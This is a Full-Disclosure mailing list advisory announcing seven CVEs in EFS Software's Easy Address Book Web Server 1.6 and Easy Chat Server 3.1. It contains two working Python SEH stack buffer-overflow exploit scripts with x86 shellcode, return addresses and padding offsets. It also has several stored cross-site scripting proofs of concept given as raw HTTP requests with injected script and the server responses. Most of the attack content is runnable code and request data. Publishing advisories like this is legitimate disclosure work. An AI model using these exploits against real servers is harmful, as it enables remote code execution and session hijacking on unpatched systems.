lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CANoQWWeJiEbMXyStQU4+f3GoJMTNr8tgKNXGonZUcjgEbHY7ng@mail.gmail.com>
Date: Wed, 30 Aug 2023 12:42:43 +0200
From: Rafael Pedrero <rafael.pedrero@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] [CVE-2023-4491, CVE-2023-4492, CVE-2023-4493, CVE-2023-4494,
 CVE-2023-4495, CVE-2023-4496,
 CVE-2023-4497] Multiple vulnerabilities in EFS Software products

# Exploit Title: Easy Address Book Web Server v1.6 - Multiple
Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-10
# CVE: CVE-2023-4491, CVE-2023-4492, CVE-2023-4493
# Vendor Homepage: http://www.efssoft.com/web-address-book-server.html
# Software Link : http://www.efssoft.com/eabws.exe (md5sum:
69f77623bb32589fb5343f598b61bbd9)
# Tested Version: 1.6
# Tested on:  Windows 7, 10

# CVE-2023-4491: Vulnerability Type: searchbook Remote Buffer Overflow

CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-119


Vulnerability description: There is a remote stack-based buffer overflow
(SEH) in /searchbook.ghp in EFS Software Easy Address Book Web Server 1.6.
By sending an overly long username string to /searchbook.ghp for asking the
name via POST, an attacker may be able to execute arbitrary code.

Proof of concept:

import socket
import struct

def sendbuff():
    # > arwin.exe kernel32.dll WinExec
    # WinExec is located at 0x776f2c91 in kernel32.dll
    shellcode_WinExec = (
"\x33\xc0"                          # XOR EAX,EAX
"\x50"                              # PUSH EAX      => padding for lpCmdLine
"\x68\x2E\x65\x78\x65"              # PUSH ".exe"
"\x68\x63\x61\x6C\x63"              # PUSH "calc"
"\x8B\xC4"                          # MOV EAX,ESP
"\x6A\x01"                          # PUSH 1
"\x50"                              # PUSH EAX
"\xBB\x91\x2c\x6f\x77"              # MOV EBX,kernel32.WinExec
"\xFF\xD3")                         # CALL EBX

    shellcode_system = (
        "\x31\xC9"                # xor ecx,ecx
        "\x51"                    # push ecx
        "\x68\x63\x61\x6C\x63"    # push 0x636c6163
        "\x54"                    # push dword ptr esp
        "\xB8\x6f\xb1\xdc\x75"    # mov eax,msvcrt.system
        "\xFF\xD0")               # call eax

    shellcode = shellcode_WinExec
    # SEH
    junk1 = "A"*455
    buffer =  junk1
    buffer += "\xeb\x10\x90\x90"            # jmp 0x10 to nops to shellcode
    buffer +=  struct.pack('<L',0x1001071e) # pop/pop/ret @ 0x1001071e
SSLEAY32.DLL from !Mona 0x1001071e
    buffer += "\x90" * 20
    buffer += shellcode
    junk2 =  "D"*(840 - 455 - len(shellcode) - 4 - 4 - 20)
    buffer += junk2
    return buffer


def REQ_POST (padding):
    POST = (
    "POST http://"+str(ip)+"/searchbook.ghp?id=1 HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0\r\n"
    "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: " + str(108 + len(padding))+ "\r\n"
    "Connection: keep-alive\r\n"
    "Referer: http://"+str(ip)+"/searchcontact.ghp?id=1\r\n"
    "Cookie: SESSIONID=3938; UserID=; PassWD=\r\n"
    "Upgrade-Insecure-Requests: 1\r\n"
    "Host: "+str(ip)+"\r\n\r\n"
    "addrbookid=1&contactid=%3C%21--cid--%3E&cancelflag=0&name=" + padding
+
"&cancelflag=0&name=AAA&Email=&address=&phone=&other=&search=Start+Search\r\n\r\n"
    )
    return POST

ip = '192.168.X.X'
port = 80
payload = sendbuff()

try:
    print "\n[*] Sending POST (searchbook.ghp) exploit to Easy Address Book
Web Server V1.6, length " + str(len(payload))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(REQ_POST(payload))
    s.recv(1024)
    s.close()
    print "\n[*] Sended POST length " + str(len(payload))
except:
    print "Connecting error"



# CVE-2023-4492: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Easy Address Book Web Server v1.6, does not
sufficiently encode user-controlled inputs, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via the /addrbook.ghp (POST
method), in multiple parameters.

Proof of concept:

POST http://localhost/addrbook.ghp?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 475
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/editcontact.ghp?id=1&cid=12
Cookie: SESSIONID=15337; UserID=; PassWD=
Upgrade-Insecure-Requests: 1
Host: localhost

addrbookid=1&contactid=14&cancelflag=0&firstname=%3C%2Fa%3E%3Cscript%3Ealert%2811%29%3B%3C%2Fscript%3E%3Ca%3E&middlename=demo1&lastname=demo1&nickname=demo1&Email=demo1%
40demo1.com
&company=demo1&jobtitle=demo1&department=demo1&office=demo1&workphone=&workfax=&workaddress=demo1&workcity=&workstate=&workzip=&workcountry=USA&homephone=&homefax=&homeaddress=demo1&homecity=&homestate=&homezip=&homecountry=USA&mobilephone=&pager=&email2=&email3=&homepage=&notes=demo1&save=Save

Vulnerable parameters: firstname, homephone, lastname, middlename,
workaddress, workcity, workcountry, workphone, workstate, workzip

Response:

 <TR>
              <TD class=row2><SPAN class=genmed><A target=_blank
class=genmed href="viewcontact.ghp?id=1&cid=12">demo1
</a><script>alert(1);</script><a> demo1</A></SPAN></TD>
              <TD class=row2 align=left><SPAN class=genmed><a href="mailto:
demo1@...o1.com">demo1@...o1.com</a></SPAN></TD>
              <TD class=row2 align=left><SPAN class=genmed></SPAN></TD>
              <TD class=row2 align=left><SPAN class=genmed></SPAN></TD>
              <TD class=row2 align=left><SPAN class=genmed>demo1, , , ,
USA</SPAN></TD>
              <TD class=row2 align=left><SPAN class=genmed><a
href="editcontact.ghp?id=1&cid=12">Edit</a></SPAN></TD>
              <TD class=row2 align=left><SPAN class=genmed><a
href="javascript:deletecontact('deletecontact.ghp?id=1&cid=12','demo1
</a><script>alert(1);</script><a> demo1')">Delete</a></SPAN></TD>



# CVE-2023-4493: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2


CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Easy Address Book Web Server v1.6, does not
sufficiently encode user-controlled inputs, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via the /users_admin.ghp (POST
method, authenticated Admin user), in multiple parameters.

Proof of concept:

Example 1:

POST http://localhost/users_admin.ghp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/users_admin.ghp
Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>
Upgrade-Insecure-Requests: 1
Host: localhost

userid=2&username=test&password=test&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&level=user&state=Enable&update_user=Update

Vulnerable parameter: email

Response:

<form method="POST" action="">
<TR>
<input type="hidden" name="userid" value="2">
<TD class=row2 align=left><input type="text" name="username" size="15"
value="test"> </TD>
<TD class=row2 align=left><input type="text" name="password" size="15"
value=""> </TD>
<TD class=row2 align=left><input type="text" name="email" size="35"
value=""><script>alert(1);</script>"> </TD>
<TD class=row2 align=left><select name="level"><option
>guest</option><option selected>user</option><option >power
user</option></select></TD>
<TD class=row2 align=left><select name="state"><option
selected>Enable</option><option >Disable</option></select></TD>
<TD class=row2 align=left><input type="submit" value="Update"
name="update_user"></TD>
<TD class=row2><SPAN class=genmed><A class=genmed
href="user_delete_admin.ghp?2">Delete</A></SPAN></TD>
</TR>
</form>

Example 2:

POST http://localhost/users_admin.ghp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/users_admin.ghp
Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>
Upgrade-Insecure-Requests: 1
Host: localhost

userid=2&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=test&email=tt%
40fsdfs.com&level=user&state=Enable&update_user=Update

Vulnerable parameter: username

Response:

<form method="POST" action="">
<TR>
<input type="hidden" name="userid" value="2">
<TD class=row2 align=left><input type="text" name="username" size="15"
value=""><script>alert(1);</script>"> </TD>
<TD class=row2 align=left><input type="text" name="password" size="15"
value=""> </TD>
<TD class=row2 align=left><input type="text" name="email" size="35" value="
tt@...fs.com"> </TD>
<TD class=row2 align=left><select name="level"><option
>guest</option><option selected>user</option><option >power
user</option></select></TD>
<TD class=row2 align=left><select name="state"><option
selected>Enable</option><option >Disable</option></select></TD>
<TD class=row2 align=left><input type="submit" value="Update"
name="update_user"></TD>
<TD class=row2><SPAN class=genmed><A class=genmed
href="user_delete_admin.ghp?2">Delete</A></SPAN></TD>
</TR>
</form>

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# Exploit Title: Easy Chat Server v3.1 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-09
# CVE: CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497
# Vendor Homepage: http://www.echatserver.com/
# Software Link : http://echatserver.com/ecssetup.exe (md5sum:
c682138ebbea9af7948a3f142bbd054b)
# Tested Version: 3.1
# Tested on:  Windows 7, 10

# CVE-2023-4494: Vulnerability Type: register Remote Buffer Overflow

CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-119


Vulnerability description: There is a remote stack-based buffer overflow
(SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1.
By sending an overly long username string to register.ghp for asking the
username via GET, an attacker may be able to execute arbitrary code.

Proof of concept:

import socket

def sendbuff():
    # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
    # msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin
    # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
    shellcode = (
    "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
    "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
    "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
    "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
    "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
    "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
    "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
    "\x1c\x39\xbd"
    )

    # SEH
    junk1 = "A"*473
    buffer =  junk1
    buffer += "\xeb\x06\x90\x90"           # short jmp to shellcode
    buffer += "\x1e\x0e\x01\x10"           # pop/pop/ret @ 0x10010E1E
SSLEAY32.DLL from !Mona
    buffer += shellcode
    junk2 =  "D"*(600 - 473 - len(shellcode) - 4 - 4)
    buffer += junk2

    return buffer


def REQ_GET (padding):
    GET = (
    "GET /register.ghp?username=" + padding + "&password= HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/86.0.4240.75 Safari/537.36\r\n"
    "Host: "+str(ip)+":80\r\n"
    "Accept-Language: es-es\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Referer: http://"+str(ip)+"\r\n"
    "Connection: Keep-Alive\r\n\r\n"
    )
    return GET

ip = '192.168.X.X' # change the ip address
port = 80
payload = sendbuff()

try:
    print "\n[*] Sending GET (register.ghp) exploit to EFS Easy Chat Server
3.1, length " + str(len(payload))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(REQ_GET(payload))
    s.recv(1024)
    s.close()
    print "\n[*] Sended GET length " + str(len(payload))
except:
    print "Connection error"



# CVE-2023-4495: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Easy Chat Server v3.1, does not sufficiently
encode user-controlled inputs, resulting in a stored Cross-Site Scripting
(XSS) vulnerability via the /registresult.htm (POST method), in Resume
parameter. The XSS is loaded from /register.ghp.

Proof of concept:

POST http://localhost/registresult.htm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 257
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/register.ghp?username=
<redacted>&password=<redacted>
Upgrade-Insecure-Requests: 1
Host: localhost

UserName=<redacted>&Password=<redacted>&Password1=demo1&Sex=0&Email=demo1%
25252540demo1.com
&Icon=0.gif&Resume=%3C%2FTEXTAREA%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3CTEXTAREA%3E&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change

Response
<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been
changed successfully.</center></body>


Go to:
http://localhost/register.ghp?username=<redacted>&password=<redacted>

Response - xss:
<TR><TD>
Your profile/interests:<BR>
<TEXTAREA rows="4" cols="30"
name="Resume"></TEXTAREA><script>alert(1)</script><TEXTAREA></TEXTAREA>
<INPUT type="hidden" name="cw" value="0">
<INPUT type="hidden" name="RoomID" value="<!--$RoomID-->">
<INPUT type="hidden" name="RepUserName" value="<!--$UserName-->">
</TD></TR>

# CVE-2023-4496: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2


CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Easy Chat Server v3.1, does not sufficiently
encode user-controlled inputs, resulting in a stored Cross-Site Scripting
(XSS) vulnerability via the /body2.ghp (POST method), in mtowho parameter.


Proof of concept:

POST http://localhost/body2.ghp?username=<redacted>&password=<redacted>&room=4
HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 248
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/chatsubmit.ghp?username=
<redacted>&password=<redacted>&room=4
Upgrade-Insecure-Requests: 1
Host: localhost

staticname=%3A000539&tnewname=&msayinfo=demo+&mnewname=&mtowho=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E&mfilters=0&mfont=0&mfcolor=1&elist=100&seltype=Theme&msg=&Submit=Send&sc=on&notifysound=on&message=demo+&chat_flag=


Response:
<html>
<head>
</head>
<body>
<script language="JavaScript">
<!--
parent.board.document.body.innerHTML=parent.board.document.body.innerHTML+"<br><font
color=green size=2>08:22:16 <a target=chatsubmit
href=javascript:parent.chatsubmit.getname('<redacted>');><redacted></a> =>
<a target=chatsubmit
href=javascript:parent.chatsubmit.getname('</script><script>alert(1);</script><script>');></script><script>alert(1);</script><script></a>
</font><font color=#000000 size=2>demo </font> <img src=/face/100.gif
border=0>";
// -->
</script>
</body>
</html>


# CVE-2023-4497: Vulnerability Type: stored Cross-Site Scripting (XSS) - #3

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Easy Chat Server v3.1, does not sufficiently
encode user-controlled inputs, resulting in a stored Cross-Site Scripting
(XSS) vulnerability via the /registresult.htm (POST method), in Icon
parameter. The XSS is loaded from /users.ghp.

Proof of concept:

POST /registresult.htm HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 235
Origin: http://localhost
Connection: close
Referer: http://localhost/register.ghp?username=
<redacted>&password=<redacted>
Upgrade-Insecure-Requests: 1

UserName=<redacted>&Password=<redacted>&Password1=<redacted>&Sex=0&Email=<redacted>%252525252540<redacted>.com&Icon="><script>alert(111)</script><img%20src="1.gif&Resume=AAA&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change

Response:
<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been
changed successfully.</center></body>

When user information page load:

http://localhost/users.ghp?username=<redacted>&password=<redacted>&room=4

&nbsp;<font color="red">[vip room]</font>
<br><br>
[Online users:1]<br><br>[<a
href="javascript:parent.chatsubmit.getname('All');"
target="chatsubmit">All</a>]
<br><br>
<script>
if(navigator.appName!="Netscape" && parent.chatsubmit.document &&
parent.chatsubmit.document.readyState == "complete")
parent.chatsubmit.listcolorchange();
</script>
<img src="/images/&quot;"><script>alert(111)</script><i>[<a
href="javascript:parent.chatsubmit.getname('<redacted>');"
target="chatsubmit"><redacted></a>]&lt;==<br>
<br>
<br><br>
[<a href="javascript:OnRegister();">Change infomation</a>]
</i>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ